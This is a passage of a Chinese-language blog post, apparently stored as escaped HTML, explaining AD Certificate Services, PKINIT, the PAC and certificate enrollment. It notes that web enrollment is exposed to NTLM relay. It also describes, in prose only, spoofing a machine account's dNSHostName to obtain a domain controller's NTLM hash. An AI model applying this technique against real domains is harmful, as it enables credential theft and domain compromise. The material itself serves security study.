6784\u7684\u7279\u5b9a\u90e8\u5206\uff0c\u540c\u65f6\u534f\u540c\u5de5\u4f5c\u4ee5\u5f62\u6210\u5b8c\u6574\u7684\u89e3\u51b3\u65b9\u6848\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"2%E3%80%81CA%E8%AF%81%E4%B9%A6%E9%A2%81%E5%8F%91%E6%9C%BA%E6%9E%84\"><\/span>2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>CA\uff08Certificate Authority\uff0c\u8bc1\u4e66\u9881\u53d1\u673a\u6784\uff09\u662fPKI\u7cfb\u7edf\u7684\u6838\u5fc3\u3002\u5176\u4f5c\u7528\u5305\u62ec\u5904\u7406\u8bc1\u4e66\u7533\u8bf7\u3001 \u8bc1\u4e66\u53d1\u653e\u3001 
\u8bc1\u4e66\u66f4\u65b0\u3001\u7ba1\u7406\u5df2\u9881\u53d1\u7684\u8bc1\u4e66\u3001\u540a\u9500\u8bc1\u4e66\u548c\u53d1\u5e03\u8bc1\u4e66\u540a\u9500\u5217\u8868(CRL)\u7b49\u3002<\/p>\n<p>Active Directory\u8bc1\u4e66\u670d\u52a1\u4e2d\u7684CA\u6709\u4f01\u4e1aCA\u548c\u72ec\u7acbCA\u3002\u4f01\u4e1aCA\u5fc5\u987b\u662f\u57df\u6210\u5458\uff0c\u5e76\u4e14\u901a\u5e38\u5904\u4e8e\u8054\u673a\u72b6\u6001\u4ee5\u9881\u53d1\u8bc1\u4e66\u6216\u8bc1\u4e66\u7b56\u7565\u3002\u800c\u72ec\u7acbCA\u53ef\u4ee5\u662f\u6210\u5458\u3001\u5de5\u4f5c\u7ec4\u6216\u57df\u3002\u72ec\u7acbCA\u4e0d\u9700\u8981ADDS\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1\uff0c\u5e76\u4e14\u53ef\u4ee5\u5728\u6ca1\u6709\u7f51\u7edc\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\u3002\u4f46\u662f\u5728\u57df\u4e2d\u57fa\u672c\u90fd\u662f\u4f7f\u7528\u4f01\u4e1aCA\uff0c\u56e0\u4e3a\u4f01\u4e1aCA\u53ef\u4ee5\u548c\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u5176\u4fe1\u606f\u4e5f\u5b58\u50a8\u5728Active Directory\u6570\u636e\u5e93\u4e2d\u3002\u4f01\u4e1aCA\u652f\u6301\u57fa\u4e8e\u8bc1\u4e66\u6a21\u677f\u521b\u5efa\u8bc1\u4e66\u548c\u81ea\u52a8\u6ce8\u518c\u8bc1\u4e66\u3002<\/p>\n<p>CA\u62e5\u6709\u516c\u94a5\u548c\u79c1\u94a5\uff1a<\/p>\n<ul>\n<li>\u79c1\u94a5\u53ea\u6709CA\u77e5\u9053\uff0c\u79c1\u94a5\u7528\u4e8e\u5bf9\u9881\u53d1\u7684\u8bc1\u4e66\u8fdb\u884c\u6570\u5b57\u7b7e\u540d<\/li>\n<li>\u516c\u94a5\u4efb\u4f55\u4eba\u90fd\u53ef\u4ee5\u77e5\u9053\uff0c\u516c\u94a5\u7528\u4e8e\u9a8c\u8bc1\u8bc1\u4e66\u662f\u5426\u7531CA\u9881\u53d1<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"3%E3%80%81PKINIT_Kerberos%E8%AE%A4%E8%AF%81\"><\/span>3\u3001PKINIT Kerberos\u8ba4\u8bc1<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4e00\u822c\u60c5\u51b5\u4e0bKerberos\u534f\u8bae\u5728AS-REQ\u8bf7\u6c42\u8fc7\u7a0b\u4e2d\uff0c\u662f\u901a\u8fc7\u7528\u6237hash\u52a0\u5bc6\u65f6\u95f4\u6233\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002\u4f46ADCS\u670d\u52a1\u53ef\u4ee5\u548cADDS\u7d27\u5bc6\u642d\u914d\u4f7f\u7528\uff0c\u6240\u4ee5\u5229\u7528\u8bc1\u4e66\u4e5f\u53ef\u4ee5\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002<\/p>\n<blockquote>\n<p><a href=\"https:\/\/www.rfc-editor.org\/rfc\/rfc4556.html\">RFC4556 Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)<\/a> \u5f15\u5165\u4e86\u5bf9Kerberos\u9884\u8eab\u4efd\u9a8c\u8bc1\u7684\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u652f\u6301\uff0c\u53ef\u4ee5\u4f7f\u7528\u8bc1\u4e66\u7684\u79c1\u94a5\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002<\/p>\n<\/blockquote>\n<p>\u6b64\u5916\uff0c\u4e3a\u4e86\u652f\u6301\u8fde\u63a5\u5230\u4e0d\u652f\u6301Kerberos\u8eab\u4efd\u9a8c\u8bc1\u7684\u7f51\u7edc\u670d\u52a1\u7684\u5e94\u7528\u7a0b\u5e8f\u7684NTLM\u8eab\u4efd\u9a8c\u8bc1\uff0cKDC\u4f1a\u5728PAC\u7279\u6743\u5c5e\u6027\u8bc1\u4e66\u7684PAC_CREDENTIAL_INFO\u7f13\u51b2\u533a\u4e2d\u8fd4\u56de\u7528\u6237\u7684NTLM Hash\uff0c\u4e5f\u5c31\u662f\u8bf4\u5f53\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884cKerberos\u8ba4\u8bc1\u65f6\uff0c\u8fd4\u56de\u7684\u7968\u636e\u7684PAC\u4e2d\u662f\u5305\u542b\u7528\u6237\u7684NTLM Hash\u7684\uff0c\u800c\u4e14\u65e0\u8bba\u4ee5\u540e\u7528\u6237\u5982\u4f55\u66f4\u6539\u5bc6\u7801\uff0c\u8fd4\u56de\u7684NTLM Hash\u90fd\u662f\u5f53\u524d\u7528\u6237\u6700\u65b0\u7684\u3002<\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%881%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPAC\"><\/span>\uff081\uff09\u4ec0\u4e48\u662fPAC<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>PAC \u901a\u5e38\u6307\u7684\u662f &quot;Privilege Attribute Certificate&quot;\uff0c\u5b83\u4e0eKerberos\u8ba4\u8bc1\u534f\u8bae\u76f8\u5173\u3002\u5728Active 
Directory\u73af\u5883\u4e2d\uff0c\u5f53\u7528\u6237\u6216\u670d\u52a1\u4f7f\u7528Kerberos\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0cPAC\u5305\u542b\u5728Kerberos\u7968\u8bc1\u4e2d\uff08\u7279\u522b\u662f\u5728TGT\u548cservice ticket\u4e2d\uff09\u3002<\/p>\n<p>\u4ee5\u4e0b\u662fPAC\u7684\u4e3b\u8981\u7279\u70b9\u548c\u5185\u5bb9\uff1a<\/p>\n<ul>\n<li>\n<p><strong>\u7528\u6237\u7684\u5b89\u5168\u6807\u8bc6\u7b26 (SID)<\/strong>\uff1a\u8fd9\u662f\u7528\u6237\u7684\u552f\u4e00\u6807\u8bc6\u7b26\uff0c\u4ee5\u53ca\u7528\u6237\u6240\u5c5e\u7684\u6240\u6709\u7ec4\u7684SID\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u7528\u6237\u7684\u6743\u9650\u548c\u7ec4\u6210\u5458\u8d44\u683c<\/strong>\uff1a\u8fd9\u5305\u62ec\u7528\u6237\u5728\u57df\u4e2d\u7684\u6240\u6709\u7ec4\u6210\u5458\u8d44\u683c\uff0c\u65e0\u8bba\u5b83\u4eec\u662f\u76f4\u63a5\u7684\u8fd8\u662f\u5d4c\u5957\u7684\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u8eab\u4efd\u9a8c\u8bc1\u4fe1\u606f<\/strong>\uff1aPAC\u5305\u542b\u5173\u4e8e\u7528\u6237\u7684\u5176\u4ed6\u9a8c\u8bc1\u4fe1\u606f\uff0c\u8fd9\u6709\u52a9\u4e8e\u670d\u52a1\u786e\u5b9a\u7528\u6237\u7684\u8eab\u4efd\u548c\u6743\u9650\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u52a0\u5bc6<\/strong>\uff1a\u4e3a\u4e86\u4fdd\u8bc1\u5b89\u5168\uff0cPAC\u7684\u5185\u5bb9\u662f\u52a0\u5bc6\u7684\uff0c\u53ea\u6709\u5177\u6709\u6b63\u786e\u5bc6\u94a5\u7684\u670d\u52a1\u624d\u80fd\u89e3\u5bc6\u5b83\u3002<\/p>\n<\/li>\n<\/ul>\n<p>PAC\u7684\u5b58\u5728\u6709\u52a9\u4e8e\u63d0\u9ad8\u6548\u7387\uff0c\u56e0\u4e3a\u4e00\u65e6\u7528\u6237\u5f97\u5230\u4e00\u4e2aKerberos\u7968\u636e\uff0c\u4ed6\u4eec\u5c31\u4e0d\u9700\u8981\u518d\u6b21\u67e5\u8be2Active 
Directory\u6765\u786e\u5b9a\u4ed6\u4eec\u7684\u6743\u9650\u6216\u7ec4\u6210\u5458\u8d44\u683c\u3002\u76f8\u53cd\uff0c\u8fd9\u4e9b\u4fe1\u606f\u90fd\u5305\u542b\u5728PAC\u4e2d\uff0c\u5e76\u968f\u7968\u636e\u4e00\u8d77\u53d1\u9001\u3002<\/p>\n<p>\u7136\u800c\uff0cPAC\u4e5f\u53ef\u80fd\u589e\u52a0\u7968\u636e\u7684\u5927\u5c0f\uff0c\u7279\u522b\u662f\u5f53\u7528\u6237\u662f\u5f88\u591a\u7ec4\u7684\u6210\u5458\u65f6\u3002\u8fd9\u53ef\u80fd\u4f1a\u5bfc\u81f4\u4e00\u4e9b\u95ee\u9898\uff0c\u4f8b\u5982\u5982\u679c\u7968\u636e\u592a\u5927\u800c\u4e0d\u80fd\u9002\u5e94\u7f51\u7edc\u5305\u3002\u4e3a\u4e86\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u6709\u65f6\u53ef\u80fd\u9700\u8981\u8c03\u6574\u76f8\u5173\u7684\u914d\u7f6e\u6216\u51cf\u5c11\u7528\u6237\u7684\u7ec4\u6210\u5458\u8d44\u683c\u3002<\/p>\n<p>\u603b\u7684\u6765\u8bf4\uff0cPAC\u662fKerberos\u5728Active Directory\u73af\u5883\u4e2d\u7684\u4e00\u4e2a\u91cd\u8981\u7ec4\u6210\u90e8\u5206\uff0c\u5b83\u5e2e\u52a9\u670d\u52a1\u5feb\u901f\u786e\u5b9a\u7528\u6237\u7684\u6743\u9650\u548c\u8eab\u4efd\uff0c\u800c\u65e0\u9700\u518d\u6b21\u67e5\u8be2AD\u3002<\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%882%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPKINIT\"><\/span>\uff082\uff09\u4ec0\u4e48\u662fPKINIT<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>PKINIT\uff08Public Key Cryptography for Initial 
Authentication\uff09\u662fKerberos\u8eab\u4efd\u9a8c\u8bc1\u534f\u8bae\u7684\u4e00\u4e2a\u6269\u5c55\u3002\u5b83\u5141\u8bb8Kerberos\u7684\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u6280\u672f\uff0c\u800c\u4e0d\u662f\u4f20\u7edf\u7684\u5bc6\u7801\u3002<\/p>\n<p>\u5177\u4f53\u6765\u8bf4\uff0c\u8fd9\u662f\u5982\u4f55\u5de5\u4f5c\u7684\uff1a<\/p>\n<ul>\n<li>\n<p><strong>\u516c\u94a5\u8bc1\u4e66<\/strong>\uff1a\u5728PKINIT\u4e2d\uff0c\u7528\u6237\u6216\u670d\u52a1\u62e5\u6709\u4e00\u4e2a\u516c\u94a5\u8bc1\u4e66\uff08\u901a\u5e38\u662fX.509\u683c\u5f0f\uff09\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1<\/strong>\uff1a\u5f53\u7528\u6237\u5c1d\u8bd5\u8fdb\u884cKerberos\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u4ed6\u4eec\u53ef\u4ee5\u4f7f\u7528\u5176\u79c1\u94a5\u5bf9\u67d0\u4e9b\u4fe1\u606f\u8fdb\u884c\u7b7e\u540d\uff0c\u7136\u540e\u5c06\u7b7e\u540d\u7684\u4fe1\u606f\u4e0e\u5176\u516c\u94a5\u8bc1\u4e66\u4e00\u8d77\u53d1\u9001\u7ed9KDC\uff08Key Distribution Center\uff09\u3002KDC\u9a8c\u8bc1\u7b7e\u540d\u5e76\u68c0\u67e5\u8bc1\u4e66\u7684\u6709\u6548\u6027\uff08\u901a\u5e38\u4e0e\u4fe1\u4efb\u7684\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u5217\u8868\u8fdb\u884c\u6bd4\u8f83\uff09\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u7968\u636e\u9881\u53d1<\/strong>\uff1a\u4e00\u65e6KDC\u9a8c\u8bc1\u4e86\u7528\u6237\u7684\u8eab\u4efd\uff0c\u5b83\u5c06\u50cf\u5f80\u5e38\u4e00\u6837\u9881\u53d1\u4e00\u4e2aTGT\uff08Ticket Granting 
Ticket\uff09\u3002<\/p>\n<\/li>\n<\/ul>\n<p>\u8fd9\u79cd\u65b9\u6cd5\u7684\u597d\u5904\u662f\uff1a<\/p>\n<ul>\n<li><strong>\u589e\u5f3a\u7684\u5b89\u5168\u6027<\/strong>\uff1a\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u63d0\u4f9b\u4e86\u6bd4\u4f20\u7edf\u5bc6\u7801\u66f4\u5f3a\u5927\u7684\u5b89\u5168\u6027\u3002<\/li>\n<li><strong>\u667a\u80fd\u5361\u652f\u6301<\/strong>\uff1aPKINIT\u5e38\u5e38\u4e0e\u667a\u80fd\u5361\u7ed3\u5408\u4f7f\u7528\u3002\u7528\u6237\u7684\u8bc1\u4e66\u548c\u79c1\u94a5\u5b58\u50a8\u5728\u667a\u80fd\u5361\u4e0a\uff0c\u4f7f\u5f97\u8eab\u4efd\u9a8c\u8bc1\u8fc7\u7a0b\u66f4\u4e3a\u5b89\u5168\u3002<\/li>\n<\/ul>\n<p>\u7f3a\u70b9\uff1a<\/p>\n<ul>\n<li><strong>\u590d\u6742\u6027<\/strong>\uff1a\u90e8\u7f72\u548c\u7ba1\u7406PKI\uff08Public Key Infrastructure\uff09\u53ef\u80fd\u4f1a\u589e\u52a0\u590d\u6742\u6027\u548c\u5f00\u9500\u3002<\/li>\n<li><strong>\u4f9d\u8d56\u4e8e\u8bc1\u4e66<\/strong>\uff1a\u8bc1\u4e66\u7684\u8fc7\u671f\u3001\u64a4\u9500\u6216\u5176\u4ed6\u95ee\u9898\u53ef\u80fd\u4f1a\u5bfc\u81f4\u8eab\u4efd\u9a8c\u8bc1\u5931\u8d25\u3002<\/li>\n<\/ul>\n<p>\u603b\u4e4b\uff0cPKINIT\u4e3aKerberos\u63d0\u4f9b\u4e86\u4e00\u4e2a\u66f4\u5b89\u5168\u7684\u8eab\u4efd\u9a8c\u8bc1\u65b9\u6cd5\uff0c\u5c24\u5176\u662f\u5f53\u7ed3\u5408\u4f7f\u7528\u667a\u80fd\u5361\u65f6\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"4%E3%80%81%E8%AF%81%E4%B9%A6%E6%A8%A1%E6%9D%BF\"><\/span>4\u3001\u8bc1\u4e66\u6a21\u677f<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u8bc1\u4e66\u6a21\u677fCertificate 
Templates\u662fCA\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u7684\u4e00\u4e2a\u7ec4\u6210\u90e8\u5206\uff0c\u662f\u8bc1\u4e66\u7b56\u7565\u4e2d\u7684\u91cd\u8981\u5143\u7d20\uff0c\u662f\u7528\u4e8e\u8bc1\u4e66\u6ce8\u518c\u3001\u4f7f\u7528\u548c\u7ba1\u7406\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u683c\u5f0f\u3002\u5f53CA\u6536\u5230\u5bf9\u8bc1\u4e66\u7684\u8bf7\u6c42\u65f6\uff0c\u5fc5\u987b\u5bf9\u8be5\u8bf7\u6c42\u5e94\u7528\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\uff0c\u4ee5\u6267\u884c\u6240\u8bf7\u6c42\u7684\u529f\u80fd\uff0c\u4f8b\u5982\u8bc1\u4e66\u9881\u53d1\u6216\u66f4\u65b0\u3002\u8fd9\u4e9b\u89c4\u5219\u53ef\u4ee5\u662f\u7b80\u5355\u7684\uff0c\u4e5f\u53ef\u4ee5\u662f\u590d\u6742\u7684\uff0c\u4e5f\u53ef\u4ee5\u9002\u7528\u4e8e\u6240\u6709\u7528\u6237\u6216\u7279\u5b9a\u7684\u7528\u6237\u7ec4\u3002\u8bc1\u4e66\u6a21\u677f\u662f\u5728CA\u4e0a\u914d\u7f6e\u5e76\u5e94\u7528\u4e8e\u4f20\u5165\u8bc1\u4e66\u8bf7\u6c42\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\u3002\u8bc1\u4e66\u6a21\u677f\u8fd8\u5411\u5ba2\u6237\u673a\u63d0\u4f9b\u4e86\u5173\u4e8e\u5982\u4f55\u521b\u5efa\u548c\u63d0\u4ea4\u6709\u6548\u7684\u8bc1\u4e66\u8bf7\u6c42\u7684\u8bf4\u660e\u3002\u57fa\u4e8e\u8bc1\u4e66\u6a21\u677f\u7684\u8bc1\u4e66\u53ea\u80fd\u7531\u4f01\u4e1aCA\u9881\u53d1\u3002\u8fd9\u4e9b\u6a21\u677f\u5b58\u50a8\u5728\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1(ADDS)\u4e2d\uff0c\u4ee5\u4f9b\u6797\u4e2d\u7684\u6bcf\u4e2aCA\u4f7f\u7528\u3002\u8fd9\u5141\u8bb8CA\u59cb\u7ec8\u80fd\u591f\u8bbf\u95ee\u5f53\u524d\u6807\u51c6\u6a21\u677f\uff0c\u5e76\u786e\u4fdd\u8de8\u6797\u4e00\u81f4\u7684\u5e94\u7528\u3002<\/p>\n<p>\u8bc1\u4e66\u6a21\u677f\u901a\u8fc7\u5141\u8bb8\u7ba1\u7406\u5458\u53d1\u5e03\u5df2\u4e3a\u9009\u5b9a\u4efb\u52a1\u9884\u5148\u914d\u7f6e\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u5927\u5927\u7b80\u5316\u7ba1\u7406\u8bc1\u4e66\u9881\u53d1\u673a\u6784(CA)\u7684\u4efb\u52a1\u3002\u8bc1\u4e66\u6a21\u677f\u7ba1\u7406\u5355\u5143\u5141\u8bb8\u7ba1\u7406\u5458\u6267\u884c\u4ee5\u4e0b\u4efb\u5
2a1\uff1a<\/p>\n<ul>\n<li>\u67e5\u770b\u6bcf\u4e2a\u8bc1\u4e66\u6a21\u677f\u7684\u5c5e\u6027<\/li>\n<li>\u590d\u5236\u548c\u4fee\u6539\u8bc1\u4e66\u6a21\u677f<\/li>\n<li>\u63a7\u5236\u54ea\u4e9b\u7528\u6237\u548c\u8ba1\u7b97\u673a\u53ef\u4ee5\u8bfb\u53d6\u6a21\u677f\u5e76\u6ce8\u518c\u8bc1\u4e66<\/li>\n<li>\u6267\u884c\u4e0e\u8bc1\u4e66\u6a21\u677f\u76f8\u5173\u7684\u5176\u4ed6\u7ba1\u7406\u4efb\u52a1<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a3e9eb.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"5%E3%80%81%E8%AF%81%E4%B9%A6%E6%B3%A8%E5%86%8C\"><\/span>5\u3001\u8bc1\u4e66\u6ce8\u518c<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4e0d\u540c\u6743\u9650\u7684\u57df\u7528\u6237\uff0c\u5728\u6ce8\u518c\u8bc1\u4e66\u65f6\uff0c\u53ea\u80fd\u6ce8\u518c\u5bf9\u5e94\u7684\u6a21\u677f\uff0c\u5728\u8bc1\u4e66\u6a21\u677f\u7684\u5b89\u5168\u5c5e\u6027\u4e2d\uff0c\u53ef\u4ee5\u770b\u5230\u54ea\u4e9b\u7528\u6237\u548c\u7ec4\u5177\u6709\u5f53\u524d\u8bc1\u4e66\u6a21\u677f\u7684\u6ce8\u518c\u6743\u9650\uff0c\u4e00\u4e2a\u8bc1\u4e66\u6ce8\u518c\u6d41\u7a0b\u5982\u4e0b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a4b572.\" alt=\"\" \/><\/p>\n<ul>\n<li>\n<p>\u5ba2\u6237\u7aef\u751f\u6210\u4e00\u5bf9\u516c\u3001\u79c1\u94a5<\/p>\n<\/li>\n<li>\n<p>\u5ba2\u6237\u7aef\u751f\u6210\u8bc1\u4e66\u7b7e\u540d\u8bf7\u6c42(CSR\uff0cCertificate Signing 
Request)\uff0c\u91cc\u9762\u5305\u542b\u5ba2\u6237\u7aef\u751f\u6210\u7684\u516c\u94a5\u4ee5\u53ca\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u3001\u8bf7\u6c42\u7684\u4e3b\u4f53\u7b49\u4fe1\u606f\u3002\u6574\u4e2aCSR\u7528\u5ba2\u6237\u7aef\u7684\u79c1\u94a5\u7b7e\u540d\uff0c\u53d1\u9001\u7ed9CA\u3002<\/p>\n<\/li>\n<li>\n<p>CA\u6536\u5230\u8bf7\u6c42\u540e\uff0c\u4ece\u4e2d\u53d6\u51fa\u516c\u94a5\u5bf9CSR\u8fdb\u884c\u7b7e\u540d\u6821\u9a8c\u3002\u6821\u9a8c\u901a\u8fc7\u540e\u5224\u65ad\u5ba2\u6237\u7aef\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u662f\u5426\u5b58\u5728\uff0c\u5982\u679c\u5b58\u5728\uff0c\u6839\u636e\u8bc1\u4e66\u6a21\u677f\u4e2d\u7684\u5c5e\u6027\u5224\u65ad\u8bf7\u6c42\u7684\u4e3b\u4f53\u662f\u5426\u6709\u6743\u9650\u7533\u8bf7\u8be5\u8bc1\u4e66\u3002\u5982\u679c\u6709\u6743\u9650\uff0c\u5219\u8fd8\u8981\u6839\u636e\u5176\u4ed6\u5c5e\u6027\uff0c\u5982\uff1a\u53d1\u5e03\u8981\u6c42\u3001\u4f7f\u7528\u8005\u540d\u79f0\u3001\u6269\u5c55\u6765\u751f\u6210\u8bc1\u4e66\u3002<\/p>\n<\/li>\n<li>\n<p>CA\u4f7f\u7528\u5176\u79c1\u94a5\u7b7e\u540d\u751f\u6210\u7684\u8bc1\u4e66\u5e76\u53d1\u9001\u7ed9\u5ba2\u6237\u7aef\u3002<\/p>\n<\/li>\n<li>\n<p>\u5ba2\u6237\u7aef\u5b58\u50a8\u8be5\u8bc1\u4e66\u5728\u7cfb\u7edf\u4e2d\u3002<\/p>\n<\/li>\n<\/ul>\n<p>\u5982\u679c\u5728\u5b89\u88c5ADCS\u670d\u52a1\u7684\u65f6\u5019\uff0c\u52fe\u9009\u4e86\u201c\u8bc1\u4e66\u9881\u53d1\u673a\u6784Web\u6ce8\u518c\u201d\u9009\u9879\uff0c\u90a3\u4e48\u5219\u53ef\u4ee5\u901a\u8fc7Web\u65b9\u5f0f\u6765\u7533\u8bf7\u8bc1\u4e66\uff0c\u5982\u679c\u8bc1\u4e66\u7533\u8bf7\u7684Web\u9875\u9762\u652f\u6301NTLM\u8ba4\u8bc1\uff08\u9ed8\u8ba4\u652f\u6301\uff09\uff0c\u5219\u53ef\u80fd\u88abNTLM\u4e2d\u7ee7\u653b\u51fb:<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a5cf95.\" alt=\"\" \/><\/p>\n<p>\u901a\u8fc7\u57df\u8d26\u53f7\u8ba4\u8bc1\u540e\u767b\u9646\uff1a<\/p>\n<p><img decoding=\"async\" 
src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a66baa.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%881%EF%BC%89%E6%99%AE%E9%80%9A%E5%9F%9F%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\"><\/span>\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u666e\u901a\u57df\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\u65f6\uff0cADCS\u670d\u52a1\u5668\u901a\u8fc7userPrincipalName\u6216sAMAccountName\u5c5e\u6027\u67e5\u627e\u5bf9\u5e94\u7528\u6237\uff0c\u5e76\u8fd4\u56dePAC\u548c\u7528\u6237Hash\uff0c\u800c\u8fd9\u4e24\u4e2a\u5c5e\u6027\u5728\u57df\u5185\u662f\u552f\u4e00\u7684\uff0c\u6240\u4ee5\u6574\u4e2a\u6d41\u7a0b\u53ef\u786e\u4fdd\u4e00\u4e00\u5bf9\u5e94\u5173\u7cfb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a70f2a.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%882%EF%BC%89%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\"><\/span>\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u8ba1\u7b97\u673a\u8d26\u53f7\u5728\u6ca1\u6709\u8bbe\u7f6edNSHostName\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u65e0\u6cd5\u5224\u65ad\u8bf7\u6c42\u673a\u5668\u7684\u8eab\u4efd\uff0c\u56e0\u6b64\u65e0\u6cd5\u751f\u6210\u8bc1\u4e66<\/p>\n<\/li>\n<li>\n<p>\u8ba1\u7b97\u673a\u8d26\u53f7\u8bbe\u7f6e\u4e86dNSHostName\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u6839\u636edNSHostName\u5c5e\u6027\u7684\u503c\u6765\u751f\u6210\u5bf9\u5e94\u8bc1\u4e66\uff0c\u5728\u6574\u4e2aADCS\u670d\u52a1\u5668\u751f\u6210\u673a\u5668\u8bc1\u4e66\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53ea\u6709dNSHostName\u5c5e\u6027\u5f71\u54cd\u4e86\u8bc1\u4e66\u6240\u5c5e\u673a\u5668\u7684\u751f\u6210\u3002<\/p>\n<\/li>\n<li>\n<p>KDC\u5728\u6536\u5230\u673a\u5668\u8d26\u53f7PKINIT 
Kerberos\u8ba4\u8bc1\u65f6\uff0cKDC\u4f1a\u53d6\u51fa\u8bc1\u4e66\u4e2d\u201c\u4f7f\u7528\u8005\u53ef\u9009\u540d\u79f0\u201d\u4e2dDNS Name\u7684\u503c\uff0c\u7136\u540e\u67e5\u8be2sAMAccountName\u5c5e\u6027\u5bf9\u5e94\u7684\u6761\u76ee\uff0c\u7528\u8be5\u6761\u76ee\u7684\u6743\u9650\u751f\u6210PAC\uff0c\u5728\u8fd9\u4e2a\u8fc7\u7a0b\u5e76\u4e0d\u4f1a\u641c\u7d22\u548c\u6821\u9a8cdNSHostName\u5c5e\u6027\u3002<\/p>\n<\/li>\n<li>\n<p>\u56e0\u6b64\u53ea\u6709dNSHostName\u5c5e\u6027\u5f71\u54cdADCS\u670d\u52a1\u5668\u751f\u6210\u5bf9\u5e94\u673a\u5668\u7684\u8bc1\u4e66\uff0c\u5e76\u4e14\u5728\u57df\u5185dNSHostName\u5c5e\u6027\u5e76\u4e0d\u5177\u6709\u552f\u4e00\u6027\uff0c\u56e0\u6b64\u53ef\u4ee5\u5229\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0c\u7136\u540e\u4fee\u6539\u8be5\u8ba1\u7b97\u673a\u8d26\u53f7\u7684dNSHostName\u5c5e\u6027\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u540d\uff0c\u8fd9\u6837\u901a\u8fc7\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\uff0c\u5c31\u53ef\u4ee5\u6b3a\u9a97ADCS\u8fd4\u56de\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u7684NTLM\u54c8\u5e0c<\/p>\n<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a7a2be.\" alt=\"\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E3%80%81%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6\"><\/span>\u4e8c\u3001\u5229\u7528\u6761\u4ef6<span 
